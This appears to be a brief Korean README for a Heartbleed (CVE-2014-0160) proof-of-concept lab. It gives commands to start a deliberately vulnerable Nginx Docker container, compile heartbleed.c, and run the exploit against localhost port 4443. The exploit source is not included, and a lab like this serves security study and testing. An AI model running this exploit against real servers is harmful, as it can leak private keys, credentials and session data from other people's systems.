
CVE-2014-0160 OpenSSL Heartbleed 개념 증명
CVE-2014-0160 OpenSSL Heartbleed 개념 증명
Docker 컨테이너를 다운로드하고 실행합니다 (취약한 Nginx 서버)
docker run -p 4443:443 -it --rm --name hb gescobero/heartbleed:1.0
Heartbleed 공격을 컴파일합니다
gcc heartbleed.c -o heartbleed
Nginx 서버를 대상으로 실행합니다
./heartbleed 127.0.0.1 4443